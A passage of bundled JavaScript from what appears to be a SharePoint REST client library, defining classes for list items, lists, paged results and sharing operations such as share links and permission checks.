queryable_1.Queryable(this, "EffectiveBasePermissions"); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "effectiveBasePermissionsForUI", { /** * Gets the effective base permissions for the item in a UI context * */ get: function () { return new queryable_1.Queryable(this, "EffectiveBasePermissionsForUI"); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "fieldValuesAsHTML", { /** * Gets the field values for this list item in their HTML representation * */ get: function () { return new queryable_1.QueryableInstance(this, "FieldValuesAsHTML"); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "fieldValuesAsText", { /** * Gets the field values for this list item in their text representation * */ get: function () { return new queryable_1.QueryableInstance(this, "FieldValuesAsText"); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "fieldValuesForEdit", { /** * Gets the field values for this list item for use in editing controls * */ get: function () { return new queryable_1.QueryableInstance(this, "FieldValuesForEdit"); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "folder", { /** * Gets the folder associated with this list item (if this item represents a folder) * */ get: function () { return new folders_1.Folder(this, "folder"); }, enumerable: true, configurable: true }); Object.defineProperty(Item.prototype, "file", { /** * Gets the folder associated with this list item (if this item represents a folder) * */ get: function () { return new files_1.File(this, "file"); }, enumerable: true, configurable: true }); /** * Updates this list intance with the supplied properties * * @param properties A plain object hash of values to update for the list * @param eTag Value used in the IF-Match header, by default "*" */ Item.prototype.update = function (properties, eTag) { var _this = this; if (eTag === void 0) { eTag = "*"; } return new Promise(function (resolve, reject) { var removeDependency = _this.addBatchDependency(); var parentList = _this.getParent(queryable_1.QueryableInstance, _this.parentUrl.substr(0, _this.parentUrl.lastIndexOf("/"))); parentList.select("ListItemEntityTypeFullName").getAs().then(function (d) { var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": d.ListItemEntityTypeFullName }, }, properties)); removeDependency(); return _this.post({ body: postBody, headers: { "IF-Match": eTag, "X-HTTP-Method": "MERGE", }, }, new ItemUpdatedParser()).then(function (data) { resolve({ data: data, item: _this, }); }); }).catch(function (e) { return reject(e); }); }); }; /** * Delete this item * * @param eTag Value used in the IF-Match header, by default "*" */ Item.prototype.delete = function (eTag) { if (eTag === void 0) { eTag = "*"; } return this.post({ headers: { "IF-Match": eTag, "X-HTTP-Method": "DELETE", }, }); }; /** * Moves the list item to the Recycle Bin and returns the identifier of the new Recycle Bin item. */ Item.prototype.recycle = function () { return this.clone(Item, "recycle", true).post(); }; /** * Gets a string representation of the full URL to the WOPI frame. * If there is no associated WOPI application, or no associated action, an empty string is returned. * * @param action Display mode: 0: view, 1: edit, 2: mobileView, 3: interactivePreview */ Item.prototype.getWopiFrameUrl = function (action) { if (action === void 0) { action = 0; } var i = this.clone(Item, "getWOPIFrameUrl(@action)", true); i._query.add("@action", action); return i.post().then(function (data) { return data.GetWOPIFrameUrl; }); }; /** * Validates and sets the values of the specified collection of fields for the list item. * * @param formValues The fields to change and their new values. * @param newDocumentUpdate true if the list item is a document being updated after upload; otherwise false. */ Item.prototype.validateUpdateListItem = function (formValues, newDocumentUpdate) { if (newDocumentUpdate === void 0) { newDocumentUpdate = false; } return this.clone(Item, "validateupdatelistitem", true).post({ body: JSON.stringify({ "formValues": formValues, bNewDocumentUpdate: newDocumentUpdate }), }); }; return Item; }(queryableshareable_1.QueryableShareableItem)); exports.Item = Item; /** * Provides paging functionality for list items */ var PagedItemCollection = (function () { function PagedItemCollection(nextUrl, results) { this.nextUrl = nextUrl; this.results = results; } Object.defineProperty(PagedItemCollection.prototype, "hasNext", { /** * If true there are more results available in the set, otherwise there are not */ get: function () { return typeof this.nextUrl === "string" && this.nextUrl.length > 0; }, enumerable: true, configurable: true }); /** * Gets the next set of results, or resolves to null if no results are available */ PagedItemCollection.prototype.getNext = function () { if (this.hasNext) { var items = new Items(this.nextUrl, null); return items.getPaged(); } return new Promise(function (r) { return r(null); }); }; return PagedItemCollection; }()); exports.PagedItemCollection = PagedItemCollection; var PagedItemCollectionParser = (function (_super) { __extends(PagedItemCollectionParser, _super); function PagedItemCollectionParser() { return _super !== null && _super.apply(this, arguments) || this; } PagedItemCollectionParser.prototype.parse = function (r) { var _this = this; return new Promise(function (resolve, reject) { if (_this.handleError(r, reject)) { r.json().then(function (json) { var nextUrl = json.hasOwnProperty("d") && json.d.hasOwnProperty("__next") ? json.d.__next : json["odata.nextLink"]; resolve(new PagedItemCollection(nextUrl, _this.parseODataJSON(json))); }); } }); }; return PagedItemCollectionParser; }(odata_1.ODataParserBase)); var ItemUpdatedParser = (function (_super) { __extends(ItemUpdatedParser, _super); function ItemUpdatedParser() { return _super !== null && _super.apply(this, arguments) || this; } ItemUpdatedParser.prototype.parse = function (r) { var _this = this; return new Promise(function (resolve, reject) { if (_this.handleError(r, reject)) { resolve({ "odata.etag": r.headers.get("etag"), }); } }); }; return ItemUpdatedParser; }(odata_1.ODataParserBase)); /***/ }), /* 11 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var items_1 = __webpack_require__(10); var views_1 = __webpack_require__(49); var contenttypes_1 = __webpack_require__(16); var fields_1 = __webpack_require__(24); var forms_1 = __webpack_require__(43); var subscriptions_1 = __webpack_require__(47); var queryable_1 = __webpack_require__(1); var queryablesecurable_1 = __webpack_require__(26); var util_1 = __webpack_require__(0); var usercustomactions_1 = __webpack_require__(19); var odata_1 = __webpack_require__(2); var exceptions_1 = __webpack_require__(3); var folders_1 = __webpack_require__(9); /** * Describes a collection of List objects * */ var Lists = (function (_super) { __extends(Lists, _super); /** * Creates a new instance of the Lists class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function Lists(baseUrl, path) { if (path === void 0) { path = "lists"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a list from the collection by title * * @param title The title of the list */ Lists.prototype.getByTitle = function (title) { return new List(this, "getByTitle('" + title + "')"); }; /** * Gets a list from the collection by guid id * * @param id The Id of the list (GUID) */ Lists.prototype.getById = function (id) { var list = new List(this); list.concat("('" + id + "')"); return list; }; /** * Adds a new list to the collection * * @param title The new list's title * @param description The new list's description * @param template The list template value * @param enableContentTypes If true content types will be allowed and enabled, otherwise they will be disallowed and not enabled * @param additionalSettings Will be passed as part of the list creation body */ Lists.prototype.add = function (title, description, template, enableContentTypes, additionalSettings) { var _this = this; if (description === void 0) { description = ""; } if (template === void 0) { template = 100; } if (enableContentTypes === void 0) { enableContentTypes = false; } if (additionalSettings === void 0) { additionalSettings = {}; } var addSettings = util_1.Util.extend({ "AllowContentTypes": enableContentTypes, "BaseTemplate": template, "ContentTypesEnabled": enableContentTypes, "Description": description, "Title": title, "__metadata": { "type": "SP.List" }, }, additionalSettings); return this.post({ body: JSON.stringify(addSettings) }).then(function (data) { return { data: data, list: _this.getByTitle(addSettings.Title) }; }); }; /** * Ensures that the specified list exists in the collection (note: this method not supported for batching) * * @param title The new list's title * @param description The new list's description * @param template The list template value * @param enableContentTypes If true content types will be allowed and enabled, otherwise they will be disallowed and not enabled * @param additionalSettings Will be passed as part of the list creation body or used to update an existing list */ Lists.prototype.ensure = function (title, description, template, enableContentTypes, additionalSettings) { var _this = this; if (description === void 0) { description = ""; } if (template === void 0) { template = 100; } if (enableContentTypes === void 0) { enableContentTypes = false; } if (additionalSettings === void 0) { additionalSettings = {}; } if (this.hasBatch) { throw new exceptions_1.NotSupportedInBatchException("The ensure list method"); } return new Promise(function (resolve, reject) { var addOrUpdateSettings = util_1.Util.extend(additionalSettings, { Title: title, Description: description, ContentTypesEnabled: enableContentTypes }, true); var list = _this.getByTitle(addOrUpdateSettings.Title); list.get().then(function (_) { list.update(addOrUpdateSettings).then(function (d) { resolve({ created: false, data: d, list: _this.getByTitle(addOrUpdateSettings.Title) }); }).catch(function (e) { return reject(e); }); }).catch(function (_) { _this.add(title, description, template, enableContentTypes, addOrUpdateSettings).then(function (r) { resolve({ created: true, data: r.data, list: _this.getByTitle(addOrUpdateSettings.Title) }); }).catch(function (e) { return reject(e); }); }); }); }; /** * Gets a list that is the default asset location for images or other files, which the users upload to their wiki pages. */ Lists.prototype.ensureSiteAssetsLibrary = function () { return this.clone(Lists, "ensuresiteassetslibrary", true).post().then(function (json) { return new List(odata_1.extractOdataId(json)); }); }; /** * Gets a list that is the default location for wiki pages. */ Lists.prototype.ensureSitePagesLibrary = function () { return this.clone(Lists, "ensuresitepageslibrary", true).post().then(function (json) { return new List(odata_1.extractOdataId(json)); }); }; return Lists; }(queryable_1.QueryableCollection)); exports.Lists = Lists; /** * Describes a single List instance * */ var List = (function (_super) { __extends(List, _super); function List() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(List.prototype, "contentTypes", { /** * Gets the content types in this list * */ get: function () { return new contenttypes_1.ContentTypes(this); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "items", { /** * Gets the items in this list * */ get: function () { return new items_1.Items(this); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "views", { /** * Gets the views in this list * */ get: function () { return new views_1.Views(this); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "fields", { /** * Gets the fields in this list * */ get: function () { return new fields_1.Fields(this); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "forms", { /** * Gets the forms in this list * */ get: function () { return new forms_1.Forms(this); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "defaultView", { /** * Gets the default view of this list * */ get: function () { return new queryable_1.QueryableInstance(this, "DefaultView"); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "userCustomActions", { /** * Get all custom actions on a site collection * */ get: function () { return new usercustomactions_1.UserCustomActions(this); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "effectiveBasePermissions", { /** * Gets the effective base permissions of this list * */ get: function () { return new queryable_1.Queryable(this, "EffectiveBasePermissions"); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "eventReceivers", { /** * Gets the event receivers attached to this list * */ get: function () { return new queryable_1.QueryableCollection(this, "EventReceivers"); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "relatedFields", { /** * Gets the related fields of this list * */ get: function () { return new queryable_1.Queryable(this, "getRelatedFields"); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "informationRightsManagementSettings", { /** * Gets the IRM settings for this list * */ get: function () { return new queryable_1.Queryable(this, "InformationRightsManagementSettings"); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "subscriptions", { /** * Gets the webhook subscriptions of this list * */ get: function () { return new subscriptions_1.Subscriptions(this); }, enumerable: true, configurable: true }); Object.defineProperty(List.prototype, "rootFolder", { /** * The root folder of the list */ get: function () { return new folders_1.Folder(this, "rootFolder"); }, enumerable: true, configurable: true }); /** * Gets a view by view guid id * */ List.prototype.getView = function (viewId) { return new views_1.View(this, "getView('" + viewId + "')"); }; /** * Updates this list intance with the supplied properties * * @param properties A plain object hash of values to update for the list * @param eTag Value used in the IF-Match header, by default "*" */ /* tslint:disable no-string-literal */ List.prototype.update = function (properties, eTag) { var _this = this; if (eTag === void 0) { eTag = "*"; } var postBody = JSON.stringify(util_1.Util.extend({ "__metadata": { "type": "SP.List" }, }, properties)); return this.post({ body: postBody, headers: { "IF-Match": eTag, "X-HTTP-Method": "MERGE", }, }).then(function (data) { var retList = _this; if (properties.hasOwnProperty("Title")) { retList = _this.getParent(List, _this.parentUrl, "getByTitle('" + properties["Title"] + "')"); } return { data: data, list: retList, }; }); }; /* tslint:enable */ /** * Delete this list * * @param eTag Value used in the IF-Match header, by default "*" */ List.prototype.delete = function (eTag) { if (eTag === void 0) { eTag = "*"; } return this.post({ headers: { "IF-Match": eTag, "X-HTTP-Method": "DELETE", }, }); }; /** * Returns the collection of changes from the change log that have occurred within the list, based on the specified query. */ List.prototype.getChanges = function (query) { return this.clone(List, "getchanges", true).post({ body: JSON.stringify({ "query": util_1.Util.extend({ "__metadata": { "type": "SP.ChangeQuery" } }, query) }), }); }; /** * Returns a collection of items from the list based on the specified query. * * @param CamlQuery The Query schema of Collaborative Application Markup * Language (CAML) is used in various ways within the context of Microsoft SharePoint Foundation * to define queries against list data. * see: * * https://msdn.microsoft.com/en-us/library/office/ms467521.aspx * * @param expands A URI with a $expand System Query Option indicates that Entries associated with * the Entry or Collection of Entries identified by the Resource Path * section of the URI must be represented inline (i.e. eagerly loaded). * see: * * https://msdn.microsoft.com/en-us/library/office/fp142385.aspx * * http://www.odata.org/documentation/odata-version-2-0/uri-conventions/#ExpandSystemQueryOption */ List.prototype.getItemsByCAMLQuery = function (query) { var expands = []; for (var _i = 1; _i < arguments.length; _i++) { expands[_i - 1] = arguments[_i]; } var q = this.clone(List, "getitems", true); return q.expand.apply(q, expands).post({ body: JSON.stringify({ "query": util_1.Util.extend({ "__metadata": { "type": "SP.CamlQuery" } }, query) }), }); }; /** * See: https://msdn.microsoft.com/en-us/library/office/dn292554.aspx */ List.prototype.getListItemChangesSinceToken = function (query) { return this.clone(List, "getlistitemchangessincetoken", true).post({ body: JSON.stringify({ "query": util_1.Util.extend({ "__metadata": { "type": "SP.ChangeLogItemQuery" } }, query) }), }, { parse: function (r) { return r.text(); } }); }; /** * Moves the list to the Recycle Bin and returns the identifier of the new Recycle Bin item. */ List.prototype.recycle = function () { return this.clone(List, "recycle", true).post().then(function (data) { if (data.hasOwnProperty("Recycle")) { return data.Recycle; } else { return data; } }); }; /** * Renders list data based on the view xml provided */ List.prototype.renderListData = function (viewXml) { var q = this.clone(List, "renderlistdata(@viewXml)"); q.query.add("@viewXml", "'" + viewXml + "'"); return q.post().then(function (data) { // data will be a string, so we parse it again data = JSON.parse(data); if (data.hasOwnProperty("RenderListData")) { return data.RenderListData; } else { return data; } }); }; /** * Gets the field values and field schema attributes for a list item. */ List.prototype.renderListFormData = function (itemId, formId, mode) { return this.clone(List, "renderlistformdata(itemid=" + itemId + ", formid='" + formId + "', mode='" + mode + "')", true).post().then(function (data) { // data will be a string, so we parse it again data = JSON.parse(data); if (data.hasOwnProperty("ListData")) { return data.ListData; } else { return data; } }); }; /** * Reserves a list item ID for idempotent list item creation. */ List.prototype.reserveListItemId = function () { return this.clone(List, "reservelistitemid", true).post().then(function (data) { if (data.hasOwnProperty("ReserveListItemId")) { return data.ReserveListItemId; } else { return data; } }); }; /** * Returns the ListItemEntityTypeFullName for this list, used when adding/updating list items. Does not support batching. * */ List.prototype.getListItemEntityTypeFullName = function () { return this.clone(List, null).select("ListItemEntityTypeFullName").getAs().then(function (o) { return o.ListItemEntityTypeFullName; }); }; return List; }(queryablesecurable_1.QueryableSecurable)); exports.List = List; /***/ }), /* 12 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var webs_1 = __webpack_require__(8); var odata_1 = __webpack_require__(2); var queryable_1 = __webpack_require__(1); var queryablesecurable_1 = __webpack_require__(26); var types_1 = __webpack_require__(13); /** * Internal helper class used to augment classes to include sharing functionality */ var QueryableShareable = (function (_super) { __extends(QueryableShareable, _super); function QueryableShareable() { return _super !== null && _super.apply(this, arguments) || this; } /** * Gets a sharing link for the supplied * * @param kind The kind of link to share * @param expiration The optional expiration for this link */ QueryableShareable.prototype.getShareLink = function (kind, expiration) { if (expiration === void 0) { expiration = null; } // date needs to be an ISO string or null var expString = expiration !== null ? expiration.toISOString() : null; // clone using the factory and send the request return this.clone(QueryableShareable, "shareLink", true).postAs({ body: JSON.stringify({ request: { createLink: true, emailData: null, settings: { expiration: expString, linkKind: kind, }, }, }), }); }; /** * Shares this instance with the supplied users * * @param loginNames Resolved login names to share * @param role The role * @param requireSignin True to require the user is authenticated, otherwise false * @param propagateAcl True to apply this share to all children * @param emailData If supplied an email will be sent with the indicated properties */ QueryableShareable.prototype.shareWith = function (loginNames, role, requireSignin, propagateAcl, emailData) { var _this = this; if (requireSignin === void 0) { requireSignin = true; } if (propagateAcl === void 0) { propagateAcl = false; } // handle the multiple input types if (!Array.isArray(loginNames)) { loginNames = [loginNames]; } var userStr = JSON.stringify(loginNames.map(function (login) { return { Key: login }; })); var roleFilter = role === types_1.SharingRole.Edit ? types_1.RoleType.Contributor : types_1.RoleType.Reader; // start by looking up the role definition id we need to set the roleValue return webs_1.Web.fromUrl(this.toUrl()).roleDefinitions.select("Id").filter("RoleTypeKind eq " + roleFilter).get().then(function (def) { if (!Array.isArray(def) || def.length < 1) { throw new Error("Could not locate a role defintion with RoleTypeKind " + roleFilter); } var postBody = { includeAnonymousLinkInEmail: requireSignin, peoplePickerInput: userStr, propagateAcl: propagateAcl, roleValue: "role:" + def[0].Id, useSimplifiedRoles: true, }; if (typeof emailData !== "undefined") { postBody = util_1.Util.extend(postBody, { emailBody: emailData.body, emailSubject: typeof emailData.subject !== "undefined" ? emailData.subject : "", sendEmail: true, }); } return _this.clone(QueryableShareable, "shareObject", true).postAs({ body: JSON.stringify(postBody), }); }); }; /** * Shares an object based on the supplied options * * @param options The set of options to send to the ShareObject method * @param bypass If true any processing is skipped and the options are sent directly to the ShareObject method */ QueryableShareable.prototype.shareObject = function (options, bypass) { var _this = this; if (bypass === void 0) { bypass = false; } if (bypass) { // if the bypass flag is set send the supplied parameters directly to the service return this.sendShareObjectRequest(options); } // extend our options with some defaults options = util_1.Util.extend(options, { group: null, includeAnonymousLinkInEmail: false, propagateAcl: false, useSimplifiedRoles: true, }, true); return this.getRoleValue(options.role, options.group).then(function (roleValue) { // handle the multiple input types if (!Array.isArray(options.loginNames)) { options.loginNames = [options.loginNames]; } var userStr = JSON.stringify(options.loginNames.map(function (login) { return { Key: login }; })); var postBody = { peoplePickerInput: userStr, roleValue: roleValue, url: options.url, }; if (typeof options.emailData !== "undefined" && options.emailData !== null) { postBody = util_1.Util.extend(postBody, { emailBody: options.emailData.body, emailSubject: typeof options.emailData.subject !== "undefined" ? options.emailData.subject : "Shared with you.", sendEmail: true, }); } return _this.sendShareObjectRequest(postBody); }); }; /** * Calls the web's UnshareObject method * * @param url The url of the object to unshare */ QueryableShareable.prototype.unshareObjectWeb = function (url) { return this.clone(QueryableShareable, "unshareObject", true).postAs({ body: JSON.stringify({ url: url, }), }); }; /** * Checks Permissions on the list of Users and returns back role the users have on the Item. * * @param recipients The array of Entities for which Permissions need to be checked. */ QueryableShareable.prototype.checkPermissions = function (recipients) { return this.clone(QueryableShareable, "checkPermissions", true).postAs({ body: JSON.stringify({ recipients: recipients, }), }); }; /** * Get Sharing Information. * * @param request The SharingInformationRequest Object. */ QueryableShareable.prototype.getSharingInformation = function (request) { if (request === void 0) { request = null; } return this.clone(QueryableShareable, "getSharingInformation", true).postAs({ body: JSON.stringify({ request: request, }), }); }; /** * Gets the sharing settings of an item. * * @param useSimplifiedRoles Determines whether to use simplified roles. */ QueryableShareable.prototype.getObjectSharingSettings = function (useSimplifiedRoles) { if (useSimplifiedRoles === void 0) { useSimplifiedRoles = true; } return this.clone(QueryableShareable, "getObjectSharingSettings", true).postAs({ body: JSON.stringify({ useSimplifiedRoles: useSimplifiedRoles, }), }); }; /** * Unshares this object */ QueryableShareable.prototype.unshareObject = function () { return this.clone(QueryableShareable, "unshareObject", true).postAs(); }; /** * Deletes a link by type * * @param kind Deletes a sharing link by the kind of link */ QueryableShareable.prototype.deleteLinkByKind = function (kind) { return this.clone(QueryableShareable, "deleteLinkByKind", true).post({ body: JSON.stringify({ linkKind: kind }), }); }; /** * Removes the specified link to the item. * * @param kind The kind of link to be deleted. * @param shareId */ QueryableShareable.prototype.unshareLink = function (kind, shareId) { if (shareId === void 0) { shareId = "00000000-0000-0000-0000-000000000000"; } return this.clone(QueryableShareable, "unshareLink", true).post({ body: JSON.stringify({ linkKind: kind, shareId: shareId }), }); }; /** * Calculates the roleValue string used in the sharing query * * @param role The Sharing Role * @param group The Group type */ QueryableShareable.prototype.getRoleValue = function (role, group) { // we will give group precedence, because we had to make a choice if (typeof group !== "undefined" && group !== null) { switch (group) { case types_1.RoleType.Contributor: return webs_1.Web.fromUrl(this.toUrl()).associatedMemberGroup.select("Id").getAs().then(function (g) { return "group: " + g.Id; }); case types_1.RoleType.Reader: case types_1.RoleType.Guest: return webs_1.Web.fromUrl(this.toUrl()).associatedVisitorGroup.select("Id").getAs().then(function (g) { return "group: " + g.Id; }); default: throw new Error("Could not determine role value for supplied value. Contributor, Reader, and Guest are supported"); } } else { var roleFilter = role === types_1.SharingRole.Edit ? types_1.RoleType.Contributor : types_1.RoleType.Reader; return webs_1.Web.fromUrl(this.toUrl()).roleDefinitions.select("Id").top(1).filter("RoleTypeKind eq " + roleFilter).getAs().then(function (def) { if (def.length < 1) { throw new Error("Could not locate associated role definition for supplied role. Edit and View are supported"); } return "role: " + def[0].Id; }); } }; QueryableShareable.prototype.getShareObjectWeb = function (candidate) { return Promise.resolve(webs_1.Web.fromUrl(candidate, "/_api/SP.Web.ShareObject")); }; QueryableShareable.prototype.sendShareObjectRequest = function (options) { return this.getShareObjectWeb(this.toUrl()).then(function (web) { return web.expand("UsersWithAccessRequests", "GroupsSharedWith").as(QueryableShareable).post({ body: JSON.stringify(options), }); }); }; return QueryableShareable; }(queryable_1.Queryable)); exports.QueryableShareable = QueryableShareable; var QueryableShareableWeb = (function (_super) { __extends(QueryableShareableWeb, _super); function QueryableShareableWeb() { return _super !== null && _super.apply(this, arguments) || this; } /** * Shares this web with the supplied users * @param loginNames The resolved login names to share * @param role The role to share this web * @param emailData Optional email data */ QueryableShareableWeb.prototype.shareWith = function (loginNames, role, emailData) { var _this = this; if (role === void 0) { role = types_1.SharingRole.View; } var dependency = this.addBatchDependency(); return webs_1.Web.fromUrl(this.toUrl(), "/_api/web/url").get().then(function (url) { dependency(); return _this.shareObject(util_1.Util.combinePaths(url, "/_layouts/15/aclinv.aspx?forSharing=1&mbypass=1"), loginNames, role, emailData); }); }; /** * Provides direct access to the static web.ShareObject method * * @param url The url to share * @param loginNames Resolved loginnames string[] of a single login name string * @param roleValue Role value * @param emailData Optional email data * @param groupId Optional group id * @param propagateAcl * @param includeAnonymousLinkInEmail * @param useSimplifiedRoles */ QueryableShareableWeb.prototype.shareObject = function (url, loginNames, role, emailData, group, propagateAcl, includeAnonymousLinkInEmail, useSimplifiedRoles) { if (propagateAcl === void 0) { propagateAcl = false; } if (includeAnonymousLinkInEmail === void 0) { includeAnonymousLinkInEmail = false; } if (useSimplifiedRoles === void 0) { useSimplifiedRoles = true; } return this.clone(QueryableShareable, null, true).shareObject({ emailData: emailData, group: group, includeAnonymousLinkInEmail: includeAnonymousLinkInEmail, loginNames: loginNames, propagateAcl: propagateAcl, role: role, url: url, useSimplifiedRoles: useSimplifiedRoles, }); }; /** * Supplies a method to pass any set of arguments to ShareObject * * @param options The set of options to send to ShareObject */ QueryableShareableWeb.prototype.shareObjectRaw = function (options) { return this.clone(QueryableShareable, null, true).shareObject(options, true); }; /** * Unshares the object * * @param url The url of the object to stop sharing */ QueryableShareableWeb.prototype.unshareObject = function (url) { return this.clone(QueryableShareable, null, true).unshareObjectWeb(url); }; return QueryableShareableWeb; }(queryablesecurable_1.QueryableSecurable)); exports.QueryableShareableWeb = QueryableShareableWeb; var QueryableShareableItem = (function (_super) { __extends(QueryableShareableItem, _super); function QueryableShareableItem() { return _super !== null && _super.apply(this, arguments) || this; } /** * Gets a link suitable for sharing for this item * * @param kind The type of link to share * @param expiration The optional expiration date */ QueryableShareableItem.prototype.getShareLink = function (kind, expiration) { if (kind === void 0) { kind = types_1.SharingLinkKind.OrganizationView; } if (expiration === void 0) { expiration = null; } return this.clone(QueryableShareable, null, true).getShareLink(kind, expiration); }; /** * Shares this item with one or more users * * @param loginNames string or string[] of resolved login names to which this item will be shared * @param role The role (View | Edit) applied to the share * @param emailData Optional, if inlucded an email will be sent. Note subject currently has no effect. */ QueryableShareableItem.prototype.shareWith = function (loginNames, role, requireSignin, emailData) { if (role === void 0) { role = types_1.SharingRole.View; } if (requireSignin === void 0) { requireSignin = true; } return this.clone(QueryableShareable, null, true).shareWith(loginNames, role, requireSignin, false, emailData); }; /** * Checks Permissions on the list of Users and returns back role the users have on the Item. * * @param recipients The array of Entities for which Permissions need to be checked. */ QueryableShareableItem.prototype.checkSharingPermissions = function (recipients) { return this.clone(QueryableShareable, null, true).checkPermissions(recipients); }; /** * Get Sharing Information. * * @param request The SharingInformationRequest Object. */ QueryableShareableItem.prototype.getSharingInformation = function (request) { if (request === void 0) { request = null; } return this.clone(QueryableShareable, null, true).getSharingInformation(request); }; /** * Gets the sharing settings of an item. * * @param useSimplifiedRoles Determines whether to use simplified roles. */ QueryableShareableItem.prototype.getObjectSharingSettings = function (useSimplifiedRoles) { if (useSimplifiedRoles === void 0) { useSimplifiedRoles = true; } return this.clone(QueryableShareable, null, true).getObjectSharingSettings(useSimplifiedRoles); }; /** * Unshare this item */ QueryableShareableItem.prototype.unshare = function () { return this.clone(QueryableShareable, null, true).unshareObject(); }; /** * Deletes a sharing link by kind * * @param kind Deletes a sharing link by the kind of link */ QueryableShareableItem.prototype.deleteSharingLinkByKind = function (kind) { return this.clone(QueryableShareable, null, true).deleteLinkByKind(kind); }; /** * Removes the specified link to the item. * * @param kind The kind of link to be deleted. * @param shareId */ QueryableShareableItem.prototype.unshareLink = function (kind, shareId) { return this.clone(QueryableShareable, null, true).unshareLink(kind, shareId); }; return QueryableShareableItem; }(queryablesecurable_1.QueryableSecurable)); exports.QueryableShareableItem = QueryableShareableItem; var FileFolderShared = (function (_super) { __extends(FileFolderShared, _super); function FileFolderShared() { return _super !== null && _super.apply(this, arguments) || this; } /** * Gets a link suitable for sharing * * @param kind The kind of link to get * @param expiration Optional, an expiration for this link */ FileFolderShared.prototype.getShareLink = function (kind, expiration) { if (kind === void 0) { kind = types_1.SharingLinkKind.OrganizationView; } if (expiration === void 0) { expiration = null; } var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.getShareLink(kind, expiration); }); }; /** * Checks Permissions on the list of Users and returns back role the users have on the Item. * * @param recipients The array of Entities for which Permissions need to be checked. */ FileFolderShared.prototype.checkSharingPermissions = function (recipients) { var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.checkPermissions(recipients); }); }; /** * Get Sharing Information. * * @param request The SharingInformationRequest Object. */ FileFolderShared.prototype.getSharingInformation = function (request) { if (request === void 0) { request = null; } var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.getSharingInformation(request); }); }; /** * Gets the sharing settings of an item. * * @param useSimplifiedRoles Determines whether to use simplified roles. */ FileFolderShared.prototype.getObjectSharingSettings = function (useSimplifiedRoles) { if (useSimplifiedRoles === void 0) { useSimplifiedRoles = true; } var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.getObjectSharingSettings(useSimplifiedRoles); }); }; /** * Unshare this item */ FileFolderShared.prototype.unshare = function () { var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.unshareObject(); }); }; /** * Deletes a sharing link by the kind of link * * @param kind The kind of link to be deleted. */ FileFolderShared.prototype.deleteSharingLinkByKind = function (kind) { var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.deleteLinkByKind(kind); }); }; /** * Removes the specified link to the item. * * @param kind The kind of link to be deleted. * @param shareId The share id to delete */ FileFolderShared.prototype.unshareLink = function (kind, shareId) { var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.unshareLink(kind, shareId); }); }; /** * For files and folders we need to use the associated item end point */ FileFolderShared.prototype.getShareable = function () { var _this = this; // sharing only works on the item end point, not the file one - so we create a folder instance with the item url internally return this.clone(QueryableShareableFile, "listItemAllFields", false).select("odata.editlink").get().then(function (d) { var shareable = new QueryableShareable(odata_1.getEntityUrl(d)); // we need to handle batching if (_this.hasBatch) { shareable = shareable.inBatch(_this.batch); } return shareable; }); }; return FileFolderShared; }(queryable_1.QueryableInstance)); exports.FileFolderShared = FileFolderShared; var QueryableShareableFile = (function (_super) { __extends(QueryableShareableFile, _super); function QueryableShareableFile() { return _super !== null && _super.apply(this, arguments) || this; } /** * Shares this item with one or more users * * @param loginNames string or string[] of resolved login names to which this item will be shared * @param role The role (View | Edit) applied to the share * @param shareEverything Share everything in this folder, even items with unique permissions. * @param requireSignin If true the user must signin to view link, otherwise anyone with the link can access the resource * @param emailData Optional, if inlucded an email will be sent. Note subject currently has no effect. */ QueryableShareableFile.prototype.shareWith = function (loginNames, role, requireSignin, emailData) { if (role === void 0) { role = types_1.SharingRole.View; } if (requireSignin === void 0) { requireSignin = true; } var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.shareWith(loginNames, role, requireSignin, false, emailData); }); }; return QueryableShareableFile; }(FileFolderShared)); exports.QueryableShareableFile = QueryableShareableFile; var QueryableShareableFolder = (function (_super) { __extends(QueryableShareableFolder, _super); function QueryableShareableFolder() { return _super !== null && _super.apply(this, arguments) || this; } /** * Shares this item with one or more users * * @param loginNames string or 